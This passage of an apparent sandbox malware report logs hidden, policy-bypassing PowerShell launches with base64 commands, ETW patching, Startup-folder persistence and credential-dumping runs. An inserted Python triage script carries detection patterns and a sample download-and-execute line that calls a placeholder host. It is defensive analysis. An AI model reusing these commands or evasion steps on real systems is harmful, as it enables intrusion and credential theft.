              Source: powershell.exe, 00000014.00000002.1775216793.0000000007425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2938033307.0000000007719000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.3771499920.000000000748E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: powershell.exe, 0000002F.00000002.2661043439.00000000073E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe API call chain: ExitProcess graph end node graph_8-34070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 7_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 7_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs Reference to suspicious API methods: LoadLibrary("ntdll.dll")
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
              Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5
bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
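The launcher rows above show the pattern the report's Sigma hits are built on: cmd.exe spawns a 32-bit powershell.exe with -noprofile, -windowstyle hidden and -ep bypass, and hands it a script that rebuilds the next stage from a [convert]::frombase64string() literal. The caveat for anyone triaging from this page is that the report prints the command line case-folded: the base64 literal is entirely lower-case, which base64 of script text essentially never is, so decoding the blob as shown here produces garbage and the real next stage has to be taken from the original .bat. The following script is an added example for this report, not Joe Sandbox code. It parses constructed "Process created" rows in the report's layout, flags the switch and cmdlet combination, decodes the embedded literal when it is intact, and refuses to decode a case-folded one; the sample rows, the example.invalid host in the constructed second stage and the flag-scoring thresholds are assumptions, while REPORT_BLOB_PREFIX is copied from the row above exactly as the page prints it.

```python
"""Triage of sandbox "Process created" rows for encoded PowerShell launches.

Added example for this report, not Joe Sandbox code. Sample rows are constructed;
REPORT_BLOB_PREFIX is the start of the base64 literal as the report prints it.
"""
import base64
import binascii
import re

# Switches and cmdlets that together correspond to the report's signatures
# ("Bypasses PowerShell execution policy", "Base64 Encoded PowerShell Command").
FLAG_PATTERNS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "downloader": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
}
# The quoted literal handed to [Convert]::FromBase64String('...'); the closing
# quote is not required because report rows are often truncated.
B64_LITERAL = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)", re.I)
PROCESS_ROW = re.compile(r"Process created:\s*(?P<image>\S+)\s+(?P<cmdline>.*)$")

POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"


def make_row(args: str) -> str:
    """Build a constructed 'Process created' row in the report's own layout."""
    return (r"Source: C:\Windows\System32\cmd.exe Process created: " + POWERSHELL
            + ' "' + POWERSHELL.lower() + '" ' + args)


# Constructed second stage (placeholder host, not taken from the report).
STAGE = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
STAGE_B64 = base64.b64encode(STAGE.encode()).decode()
# Prefix of the report's literal exactly as printed: already lower-cased.
REPORT_BLOB_PREFIX = "awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dy"
LAUNCHER = ("-noprofile -windowstyle hidden -ep bypass -command "
            "\"[text.encoding]::utf8.getstring([convert]::frombase64string('%s'))\"")

SAMPLE_ROWS = {
    "encoded_launcher": make_row(LAUNCHER % STAGE_B64),
    "report_blob": make_row(LAUNCHER % REPORT_BLOB_PREFIX),
    "benign": make_row('-command "Get-Date"'),
}


def decode_payload(blob: str):
    """Decode a base64 literal, returning (text_or_None, note).

    Base64 of script text practically always contains upper-case letters; a long
    literal without any has been case-folded by the tooling (as in this report)
    and decoding it would yield garbage, so it is reported rather than decoded.
    """
    if len(blob) >= 40 and not any(c.isupper() for c in blob):
        return None, "case-folded: decode is lossy, recover the original command line"
    padded = blob + "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None, "not valid base64"
    text = raw.decode("utf-8", errors="replace")
    if text.count("\ufffd") > len(text) // 10:
        return None, "decoded bytes are not text"
    return text, "decoded"


def triage_row(row: str) -> dict:
    """Score one 'Process created' row and decode any embedded base64 payload."""
    m = PROCESS_ROW.search(row)
    if not m:
        return {"image": None, "flags": [], "payload": None,
                "note": "no process row", "suspicious": False}
    image, cmdline = m.group("image"), m.group("cmdline")
    flags = [name for name, rx in FLAG_PATTERNS.items() if rx.search(cmdline)]
    payload, note = None, "no base64 literal"
    lit = B64_LITERAL.search(cmdline)
    if lit:
        payload, note = decode_payload(lit.group(1))
        if payload:
            # Second-stage indicators live in the decoded script, not the launcher.
            flags += ["decoded:" + n for n, rx in FLAG_PATTERNS.items() if rx.search(payload)]
    suspicious = len(flags) >= 3 or (
        "base64_decode" in flags and "invoke_expression" in flags)
    return {"image": image, "flags": flags, "payload": payload,
            "note": note, "suspicious": suspicious}


if __name__ == "__main__":
    for name, row in SAMPLE_ROWS.items():
        v = triage_row(row)
        print(f"{name}: suspicious={v['suspicious']} flags={v['flags']} note={v['note']}")
```

The three-flag threshold is deliberately loose: -noprofile with -windowstyle hidden and -ep bypass is already enough to escalate a launcher, and the decoded second stage only adds weight. When a literal comes back as case-folded, the fix is on the collection side (pull the command line from the original sample or from Script Block Logging), not on the decoder.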
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
